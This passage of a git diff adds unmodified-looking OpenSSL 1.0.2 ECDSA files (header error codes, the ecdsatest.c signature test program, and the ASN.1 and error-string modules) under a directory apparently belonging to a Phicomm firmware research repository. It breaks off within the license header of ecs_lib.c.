+void ECDSA_METHOD_set_flags(ECDSA_METHOD *ecdsa_method, int flags);
+
+/**  Set the flags field in the ECDSA_METHOD
+ *   \param  ecdsa_method  pointer to existing ECDSA_METHOD
+ *   \param  flags flags value to set
+ */
+
+void ECDSA_METHOD_set_name(ECDSA_METHOD *ecdsa_method, char *name);
+
+/**  Set the name field in the ECDSA_METHOD
+ *   \param  ecdsa_method  pointer to existing ECDSA_METHOD
+ *   \param  name name to set
+ */
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_ECDSA_strings(void);
+
+/* Error codes for the ECDSA functions. */
+
+/* Function codes. */
+# define ECDSA_F_ECDSA_CHECK                              104
+# define ECDSA_F_ECDSA_DATA_NEW_METHOD                    100
+# define ECDSA_F_ECDSA_DO_SIGN                            101
+# define ECDSA_F_ECDSA_DO_VERIFY                          102
+# define ECDSA_F_ECDSA_METHOD_NEW                         105
+# define ECDSA_F_ECDSA_SIGN_SETUP                         103
+
+/* Reason codes. */
+# define ECDSA_R_BAD_SIGNATURE                            100
+# define ECDSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE              101
+# define ECDSA_R_ERR_EC_LIB                               102
+# define ECDSA_R_MISSING_PARAMETERS                       103
+# define ECDSA_R_NEED_NEW_SETUP_VALUES                    106
+# define ECDSA_R_NON_FIPS_METHOD                          107
+# define ECDSA_R_RANDOM_NUMBER_GENERATION_FAILED          104
+# define ECDSA_R_SIGNATURE_MALLOC_FAILED                  105
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecdsatest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecdsatest.c
new file mode 100644
index 0000000..b2d78f3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecdsatest.c
@@ -0,0 +1,556 @@
+/* crypto/ecdsa/ecdsatest.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * The elliptic curve binary polynomial software is originally written by
+ * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <openssl/opensslconf.h> /* To see if OPENSSL_NO_ECDSA is defined */
+
+#ifdef OPENSSL_NO_ECDSA
+int main(int argc, char *argv[])
+{
+    puts("Elliptic curves are disabled.");
+    return 0;
+}
+#else
+
+# include <openssl/crypto.h>
+# include <openssl/bio.h>
+# include <openssl/evp.h>
+# include <openssl/bn.h>
+# include <openssl/ecdsa.h>
+# ifndef OPENSSL_NO_ENGINE
+#  include <openssl/engine.h>
+# endif
+# include <openssl/err.h>
+# include <openssl/rand.h>
+
+static const char rnd_seed[] = "string to make the random number generator "
+    "think it has entropy";
+
+/* declaration of the test functions */
+int x9_62_tests(BIO *);
+int x9_62_test_internal(BIO *out, int nid, const char *r, const char *s);
+int test_builtin(BIO *);
+
+/* functions to change the RAND_METHOD */
+int change_rand(void);
+int restore_rand(void);
+int fbytes(unsigned char *buf, int num);
+
+RAND_METHOD fake_rand;
+const RAND_METHOD *old_rand;
+
+int change_rand(void)
+{
+    /* save old rand method */
+    if ((old_rand = RAND_get_rand_method()) == NULL)
+        return 0;
+
+    fake_rand.seed = old_rand->seed;
+    fake_rand.cleanup = old_rand->cleanup;
+    fake_rand.add = old_rand->add;
+    fake_rand.status = old_rand->status;
+    /* use own random function */
+    fake_rand.bytes = fbytes;
+    fake_rand.pseudorand = old_rand->bytes;
+    /* set new RAND_METHOD */
+    if (!RAND_set_rand_method(&fake_rand))
+        return 0;
+    return 1;
+}
+
+int restore_rand(void)
+{
+    if (!RAND_set_rand_method(old_rand))
+        return 0;
+    else
+        return 1;
+}
+
+static int fbytes_counter = 0;
+static const char *numbers[8] = {
+    "651056770906015076056810763456358567190100156695615665659",
+    "6140507067065001063065065565667405560006161556565665656654",
+    "8763001015071075675010661307616710783570106710677817767166"
+        "71676178726717",
+    "7000000175690566466555057817571571075705015757757057795755"
+        "55657156756655",
+    "1275552191113212300012030439187146164646146646466749494799",
+    "1542725565216523985789236956265265265235675811949404040041",
+    "1456427555219115346513212300075341203043918714616464614664"
+        "64667494947990",
+    "1712787255652165239672857892369562652652652356758119494040"
+        "40041670216363"
+};
+
+int fbytes(unsigned char *buf, int num)
+{
+    int ret;
+    BIGNUM *tmp = NULL;
+
+    if (fbytes_counter >= 8)
+        return 0;
+    tmp = BN_new();
+    if (!tmp)
+        return 0;
+    if (!BN_dec2bn(&tmp, numbers[fbytes_counter])) {
+        BN_free(tmp);
+        return 0;
+    }
+    fbytes_counter++;
+    if (num != BN_num_bytes(tmp) || !BN_bn2bin(tmp, buf))
+        ret = 0;
+    else
+        ret = 1;
+    if (tmp)
+        BN_free(tmp);
+    return ret;
+}
+
+/* some tests from the X9.62 draft */
+int x9_62_test_internal(BIO *out, int nid, const char *r_in, const char *s_in)
+{
+    int ret = 0;
+    const char message[] = "abc";
+    unsigned char digest[20];
+    unsigned int dgst_len = 0;
+    EVP_MD_CTX md_ctx;
+    EC_KEY *key = NULL;
+    ECDSA_SIG *signature = NULL;
+    BIGNUM *r = NULL, *s = NULL;
+
+    EVP_MD_CTX_init(&md_ctx);
+    /* get the message digest */
+    EVP_DigestInit(&md_ctx, EVP_ecdsa());
+    EVP_DigestUpdate(&md_ctx, (const void *)message, 3);
+    EVP_DigestFinal(&md_ctx, digest, &dgst_len);
+
+    BIO_printf(out, "testing %s: ", OBJ_nid2sn(nid));
+    /* create the key */
+    if ((key = EC_KEY_new_by_curve_name(nid)) == NULL)
+        goto x962_int_err;
+    if (!EC_KEY_generate_key(key))
+        goto x962_int_err;
+    BIO_printf(out, ".");
+    (void)BIO_flush(out);
+    /* create the signature */
+    signature = ECDSA_do_sign(digest, 20, key);
+    if (signature == NULL)
+        goto x962_int_err;
+    BIO_printf(out, ".");
+    (void)BIO_flush(out);
+    /* compare the created signature with the expected signature */
+    if ((r = BN_new()) == NULL || (s = BN_new()) == NULL)
+        goto x962_int_err;
+    if (!BN_dec2bn(&r, r_in) || !BN_dec2bn(&s, s_in))
+        goto x962_int_err;
+    if (BN_cmp(signature->r, r) || BN_cmp(signature->s, s))
+        goto x962_int_err;
+    BIO_printf(out, ".");
+    (void)BIO_flush(out);
+    /* verify the signature */
+    if (ECDSA_do_verify(digest, 20, signature, key) != 1)
+        goto x962_int_err;
+    BIO_printf(out, ".");
+    (void)BIO_flush(out);
+
+    BIO_printf(out, " ok\n");
+    ret = 1;
+ x962_int_err:
+    if (!ret)
+        BIO_printf(out, " failed\n");
+    if (key)
+        EC_KEY_free(key);
+    if (signature)
+        ECDSA_SIG_free(signature);
+    if (r)
+        BN_free(r);
+    if (s)
+        BN_free(s);
+    EVP_MD_CTX_cleanup(&md_ctx);
+    return ret;
+}
+
+int x9_62_tests(BIO *out)
+{
+    int ret = 0;
+
+    BIO_printf(out, "some tests from X9.62:\n");
+
+    /* set own rand method */
+    if (!change_rand())
+        goto x962_err;
+
+    if (!x9_62_test_internal(out, NID_X9_62_prime192v1,
+                             "3342403536405981729393488334694600415596881826869351677613",
+                             "5735822328888155254683894997897571951568553642892029982342"))
+        goto x962_err;
+    if (!x9_62_test_internal(out, NID_X9_62_prime239v1,
+                             "3086361431751678114926225473006680188549593787585317781474"
+                             "62058306432176",
+                             "3238135532097973577080787768312505059318910517550078427819"
+                             "78505179448783"))
+        goto x962_err;
+# ifndef OPENSSL_NO_EC2M
+    if (!x9_62_test_internal(out, NID_X9_62_c2tnb191v1,
+                             "87194383164871543355722284926904419997237591535066528048",
+                             "308992691965804947361541664549085895292153777025772063598"))
+        goto x962_err;
+    if (!x9_62_test_internal(out, NID_X9_62_c2tnb239v1,
+                             "2159633321041961198501834003903461262881815148684178964245"
+                             "5876922391552",
+                             "1970303740007316867383349976549972270528498040721988191026"
+                             "49413465737174"))
+        goto x962_err;
+# endif
+    ret = 1;
+ x962_err:
+    if (!restore_rand())
+        ret = 0;
+    return ret;
+}
+
+int test_builtin(BIO *out)
+{
+    EC_builtin_curve *curves = NULL;
+    size_t crv_len = 0, n = 0;
+    EC_KEY *eckey = NULL, *wrong_eckey = NULL;
+    EC_GROUP *group;
+    ECDSA_SIG *ecdsa_sig = NULL;
+    unsigned char digest[20], wrong_digest[20];
+    unsigned char *signature = NULL;
+    const unsigned char *sig_ptr;
+    unsigned char *sig_ptr2;
+    unsigned char *raw_buf = NULL;
+    unsigned int sig_len, degree, r_len, s_len, bn_len, buf_len;
+    int nid, ret = 0;
+
+    /* fill digest values with some random data */
+    if (!RAND_pseudo_bytes(digest, 20) ||
+        !RAND_pseudo_bytes(wrong_digest, 20)) {
+        BIO_printf(out, "ERROR: unable to get random data\n");
+        goto builtin_err;
+    }
+
+    /*
+     * create and verify a ecdsa signature with every availble curve (with )
+     */
+    BIO_printf(out, "\ntesting ECDSA_sign() and ECDSA_verify() "
+               "with some internal curves:\n");
+
+    /* get a list of all internal curves */
+    crv_len = EC_get_builtin_curves(NULL, 0);
+
+    curves = OPENSSL_malloc(sizeof(EC_builtin_curve) * crv_len);
+
+    if (curves == NULL) {
+        BIO_printf(out, "malloc error\n");
+        goto builtin_err;
+    }
+
+    if (!EC_get_builtin_curves(curves, crv_len)) {
+        BIO_printf(out, "unable to get internal curves\n");
+        goto builtin_err;
+    }
+
+    /* now create and verify a signature for every curve */
+    for (n = 0; n < crv_len; n++) {
+        unsigned char dirt, offset;
+
+        nid = curves[n].nid;
+        if (nid == NID_ipsec4)
+            continue;
+        /* create new ecdsa key (== EC_KEY) */
+        if ((eckey = EC_KEY_new()) == NULL)
+            goto builtin_err;
+        group = EC_GROUP_new_by_curve_name(nid);
+        if (group == NULL)
+            goto builtin_err;
+        if (EC_KEY_set_group(eckey, group) == 0)
+            goto builtin_err;
+        EC_GROUP_free(group);
+        degree = EC_GROUP_get_degree(EC_KEY_get0_group(eckey));
+        if (degree < 160)
+            /* drop the curve */
+        {
+            EC_KEY_free(eckey);
+            eckey = NULL;
+            continue;
+        }
+        BIO_printf(out, "%s: ", OBJ_nid2sn(nid));
+        /* create key */
+        if (!EC_KEY_generate_key(eckey)) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        /* create second key */
+        if ((wrong_eckey = EC_KEY_new()) == NULL)
+            goto builtin_err;
+        group = EC_GROUP_new_by_curve_name(nid);
+        if (group == NULL)
+            goto builtin_err;
+        if (EC_KEY_set_group(wrong_eckey, group) == 0)
+            goto builtin_err;
+        EC_GROUP_free(group);
+        if (!EC_KEY_generate_key(wrong_eckey)) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+
+        BIO_printf(out, ".");
+        (void)BIO_flush(out);
+        /* check key */
+        if (!EC_KEY_check_key(eckey)) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        BIO_printf(out, ".");
+        (void)BIO_flush(out);
+        /* create signature */
+        sig_len = ECDSA_size(eckey);
+        if ((signature = OPENSSL_malloc(sig_len)) == NULL)
+            goto builtin_err;
+        if (!ECDSA_sign(0, digest, 20, signature, &sig_len, eckey)) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        BIO_printf(out, ".");
+        (void)BIO_flush(out);
+        /* verify signature */
+        if (ECDSA_verify(0, digest, 20, signature, sig_len, eckey) != 1) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        BIO_printf(out, ".");
+        (void)BIO_flush(out);
+        /* verify signature with the wrong key */
+        if (ECDSA_verify(0, digest, 20, signature, sig_len, wrong_eckey) == 1) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        BIO_printf(out, ".");
+        (void)BIO_flush(out);
+        /* wrong digest */
+        if (ECDSA_verify(0, wrong_digest, 20, signature, sig_len, eckey) == 1) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        BIO_printf(out, ".");
+        (void)BIO_flush(out);
+        /* wrong length */
+        if (ECDSA_verify(0, digest, 20, signature, sig_len - 1, eckey) == 1) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        BIO_printf(out, ".");
+        (void)BIO_flush(out);
+
+        /*
+         * Modify a single byte of the signature: to ensure we don't garble
+         * the ASN1 structure, we read the raw signature and modify a byte in
+         * one of the bignums directly.
+         */
+        sig_ptr = signature;
+        if ((ecdsa_sig = d2i_ECDSA_SIG(NULL, &sig_ptr, sig_len)) == NULL) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+
+        /* Store the two BIGNUMs in raw_buf. */
+        r_len = BN_num_bytes(ecdsa_sig->r);
+        s_len = BN_num_bytes(ecdsa_sig->s);
+        bn_len = (degree + 7) / 8;
+        if ((r_len > bn_len) || (s_len > bn_len)) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        buf_len = 2 * bn_len;
+        if ((raw_buf = OPENSSL_malloc(buf_len)) == NULL)
+            goto builtin_err;
+        /* Pad the bignums with leading zeroes. */
+        memset(raw_buf, 0, buf_len);
+        BN_bn2bin(ecdsa_sig->r, raw_buf + bn_len - r_len);
+        BN_bn2bin(ecdsa_sig->s, raw_buf + buf_len - s_len);
+
+        /* Modify a single byte in the buffer. */
+        offset = raw_buf[10] % buf_len;
+        dirt = raw_buf[11] ? raw_buf[11] : 1;
+        raw_buf[offset] ^= dirt;
+        /* Now read the BIGNUMs back in from raw_buf. */
+        if ((BN_bin2bn(raw_buf, bn_len, ecdsa_sig->r) == NULL) ||
+            (BN_bin2bn(raw_buf + bn_len, bn_len, ecdsa_sig->s) == NULL))
+            goto builtin_err;
+
+        sig_ptr2 = signature;
+        sig_len = i2d_ECDSA_SIG(ecdsa_sig, &sig_ptr2);
+        if (ECDSA_verify(0, digest, 20, signature, sig_len, eckey) == 1) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        /*
+         * Sanity check: undo the modification and verify signature.
+         */
+        raw_buf[offset] ^= dirt;
+        if ((BN_bin2bn(raw_buf, bn_len, ecdsa_sig->r) == NULL) ||
+            (BN_bin2bn(raw_buf + bn_len, bn_len, ecdsa_sig->s) == NULL))
+            goto builtin_err;
+
+        sig_ptr2 = signature;
+        sig_len = i2d_ECDSA_SIG(ecdsa_sig, &sig_ptr2);
+        if (ECDSA_verify(0, digest, 20, signature, sig_len, eckey) != 1) {
+            BIO_printf(out, " failed\n");
+            goto builtin_err;
+        }
+        BIO_printf(out, ".");
+        (void)BIO_flush(out);
+
+        BIO_printf(out, " ok\n");
+        /* cleanup */
+        /* clean bogus errors */
+        ERR_clear_error();
+        OPENSSL_free(signature);
+        signature = NULL;
+        EC_KEY_free(eckey);
+        eckey = NULL;
+        EC_KEY_free(wrong_eckey);
+        wrong_eckey = NULL;
+        ECDSA_SIG_free(ecdsa_sig);
+        ecdsa_sig = NULL;
+        OPENSSL_free(raw_buf);
+        raw_buf = NULL;
+    }
+
+    ret = 1;
+ builtin_err:
+    if (eckey)
+        EC_KEY_free(eckey);
+    if (wrong_eckey)
+        EC_KEY_free(wrong_eckey);
+    if (ecdsa_sig)
+        ECDSA_SIG_free(ecdsa_sig);
+    if (signature)
+        OPENSSL_free(signature);
+    if (raw_buf)
+        OPENSSL_free(raw_buf);
+    if (curves)
+        OPENSSL_free(curves);
+
+    return ret;
+}
+
+int main(void)
+{
+    int ret = 1;
+    BIO *out;
+
+    out = BIO_new_fp(stdout, BIO_NOCLOSE);
+
+    /* enable memory leak checking unless explicitly disabled */
+    if (!((getenv("OPENSSL_DEBUG_MEMORY") != NULL) &&
+          (0 == strcmp(getenv("OPENSSL_DEBUG_MEMORY"), "off")))) {
+        CRYPTO_malloc_debug_init();
+        CRYPTO_set_mem_debug_options(V_CRYPTO_MDEBUG_ALL);
+    } else {
+        /* OPENSSL_DEBUG_MEMORY=off */
+        CRYPTO_set_mem_debug_functions(0, 0, 0, 0, 0);
+    }
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    ERR_load_crypto_strings();
+
+    /* initialize the prng */
+    RAND_seed(rnd_seed, sizeof(rnd_seed));
+
+    /* the tests */
+    if (!x9_62_tests(out))
+        goto err;
+    if (!test_builtin(out))
+        goto err;
+
+    ret = 0;
+ err:
+    if (ret)
+        BIO_printf(out, "\nECDSA test failed\n");
+    else
+        BIO_printf(out, "\nECDSA test passed\n");
+    if (ret)
+        ERR_print_errors(out);
+    CRYPTO_cleanup_all_ex_data();
+    ERR_remove_thread_state(NULL);
+    ERR_free_strings();
+    CRYPTO_mem_leaks(out);
+    if (out != NULL)
+        BIO_free(out);
+    return ret;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_asn1.c
new file mode 100644
index 0000000..508b079
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_asn1.c
@@ -0,0 +1,67 @@
+/* crypto/ecdsa/ecs_asn1.c */
+/* ====================================================================
+ * Copyright (c) 2000-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ecs_locl.h"
+#include <openssl/err.h>
+#include <openssl/asn1t.h>
+
+ASN1_SEQUENCE(ECDSA_SIG) = {
+        ASN1_SIMPLE(ECDSA_SIG, r, CBIGNUM),
+        ASN1_SIMPLE(ECDSA_SIG, s, CBIGNUM)
+} ASN1_SEQUENCE_END(ECDSA_SIG)
+
+DECLARE_ASN1_FUNCTIONS_const(ECDSA_SIG)
+DECLARE_ASN1_ENCODE_FUNCTIONS_const(ECDSA_SIG, ECDSA_SIG)
+IMPLEMENT_ASN1_FUNCTIONS_const(ECDSA_SIG)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_err.c
new file mode 100644
index 0000000..f1fa7b5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_err.c
@@ -0,0 +1,107 @@
+/* crypto/ecdsa/ecs_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/ecdsa.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_ECDSA,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_ECDSA,0,reason)
+
+static ERR_STRING_DATA ECDSA_str_functs[] = {
+    {ERR_FUNC(ECDSA_F_ECDSA_CHECK), "ECDSA_CHECK"},
+    {ERR_FUNC(ECDSA_F_ECDSA_DATA_NEW_METHOD), "ECDSA_DATA_NEW_METHOD"},
+    {ERR_FUNC(ECDSA_F_ECDSA_DO_SIGN), "ECDSA_do_sign"},
+    {ERR_FUNC(ECDSA_F_ECDSA_DO_VERIFY), "ECDSA_do_verify"},
+    {ERR_FUNC(ECDSA_F_ECDSA_METHOD_NEW), "ECDSA_METHOD_new"},
+    {ERR_FUNC(ECDSA_F_ECDSA_SIGN_SETUP), "ECDSA_sign_setup"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA ECDSA_str_reasons[] = {
+    {ERR_REASON(ECDSA_R_BAD_SIGNATURE), "bad signature"},
+    {ERR_REASON(ECDSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE),
+     "data too large for key size"},
+    {ERR_REASON(ECDSA_R_ERR_EC_LIB), "err ec lib"},
+    {ERR_REASON(ECDSA_R_MISSING_PARAMETERS), "missing parameters"},
+    {ERR_REASON(ECDSA_R_NEED_NEW_SETUP_VALUES), "need new setup values"},
+    {ERR_REASON(ECDSA_R_NON_FIPS_METHOD), "non fips method"},
+    {ERR_REASON(ECDSA_R_RANDOM_NUMBER_GENERATION_FAILED),
+     "random number generation failed"},
+    {ERR_REASON(ECDSA_R_SIGNATURE_MALLOC_FAILED), "signature malloc failed"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_ECDSA_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(ECDSA_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, ECDSA_str_functs);
+        ERR_load_strings(0, ECDSA_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_lib.c
new file mode 100644
index 0000000..1c02310
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_lib.c
@@ -0,0 +1,354 @@
+/* crypto/ecdsa/ecs_lib.c */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
